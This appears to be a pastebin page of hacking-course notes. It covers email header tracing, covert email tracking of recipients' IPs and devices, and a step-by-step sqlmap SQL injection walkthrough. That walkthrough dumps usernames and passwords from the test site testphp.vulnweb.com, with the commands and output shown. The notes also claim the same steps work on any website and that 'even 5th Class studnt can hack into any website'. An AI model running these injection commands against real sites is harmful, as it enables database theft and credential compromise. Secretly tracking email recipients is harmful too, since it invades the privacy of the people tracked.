7SuU12Cm

· 6 years ago · Nov 19, 2019, 03:54 AM
1
2Email Tracing & Tracking
3
4
5Source : From where we recived a mail  <--- Email Tracing
6
7Destination : To whom u send a mail <-- Email Tracking 
8---------------------------------------
9
10Automated SQL Injection - CLI
11Automated SQL Injection - GUI
12
13
14-------
15
16
17Email Tracing : 
18===============
19
20PM : I ll kill u <-- ANy such mail is coming 
21
22
23From where this mail is coming..!!!
24
25
26Every mail comes with : Header 
27
28
29Header : It contains the Information of the sender 
30
31Server Information (Gmail.com / emkei.cz / 000website etc)
32
33Sometime, we can also get to know the IP address of the Sender (Most in Yahoo Mail)
34
35----
36
37
38How to see Header 
39
40
41Step 1: Open a Mail 
42
43
44Step 2: Show Option --> Show Origional / Show Header / Show Source
45
46
47Step 3: Line : Received from : This would contain IP of Sender (Own/Server - Confirm - ip2locatiom)
48
49
50---
51
52Puneet ---> Palvinder
53
54If we want to locate a person by using mail --> Simply send a mail --> Email Tracking
55
56Detail that we can collect about the Receiver:
57
581. IP Address
59
602. Open | Delivered
61
623. Devices
63
644. Read Duration
65
665. Click on Links.??
67
68-----
69
70www.whoreadme.com  <-- Easy to Use  
71
72or
73
74www.getnotify.com
75
76-----
77
78EMAIL TRACKING FOR GMAIL  :; Addon - Mail Track
79
80--------------------------------------------
81
82
83Automated SQL Injection - CLI 
84===============================
85
86
87Kali Linux :
88
89Union Based Injection 
90
91Tool : SQLMAP 
92
93
94Target : PHP or ASP (Below Steps are same)
95
96
97
98This is pre installed in Kali Linux, this tool contain only 4 Steps
99
100Need for This Tool : Just a website with get Method.
101
102
103Target : http://testphp.vulnweb.com/listproducts.php?cat=1
104
105
106Step 1: Open Terminal 
107
108
109Step 2: Find Database Name of Target Website
110
111#sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
112
113-u = URL
114
115--dbs = Database Name
116
117
118Output :
119
120available databases [2]:
121[*] acuart 					<-----
122[*] information_schema
123
124
125Database ---> Tables ---> Columns ---> Data
126
127
128Step 3: Find Tables 
129
130#sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart
131
132--tables = We need Tables
133
134-D = From which Database
135
136
137Database: acuart
138[8 tables]
139+-----------+
140| artists   |
141| carts     |
142| categ     |
143| featured  |
144| guestbook |
145| pictures  |
146| products  |
147| users     |  <-----
148+-----------+
149
150
151Step 4 : Get Columns :
152
153#sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -T users -D acuart
154
155--columns = We need columns
156
157-T = Name of the Table
158
159
160Database: acuart
161Table: users
162[8 columns]
163+---------+--------------+
164| Column  | Type         |
165+---------+--------------+
166| address | mediumtext   |
167| cart    | varchar(100) |
168| cc      | varchar(100) |
169| email   | varchar(100) |
170| name    | varchar(100) |
171| pass    | varchar(100) |  <----
172| phone   | varchar(100) |
173| uname   | varchar(100) |  <-----
174+---------+--------------+
175
176
177Step 5: Get Data
178
179
180#sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dump -C uname,pass -T users -D acuart
181
182tching entries of column(s) 'pass, uname' for table 'users' in database 'acuart'
183Database: acuart
184Table: users
185[1 entry]
186+-------+------+
187| uname | pass |
188+-------+------+
189| test  | test |
190+-------+------+
191
192
193
194These above steps are same all website, only website name will get change
195
196
197
198
199Automated SQL Injection - GUI
200=============================
201
202Tool : Havij
203
204Windows OS
205
206
207Simple, even 5th Class studnt can hack into any website
208
209Let see.
210
211Download : 
212
213Manual : Yes
214
215Automated : Yes <---- SQLMAP  (Authenticated Tool in Kali)
216
217---------------------
218
219USA : ComptiaA or EC Council -- Exam Directly
220
2213 Years <-- OSCP - 48 Hours Regular (65000) - Articles + Practice CTF
222
22324 Hour <--- No Break
224
225Next --> 4-5 Hour
226
227---------------------
228
229OSWP : <----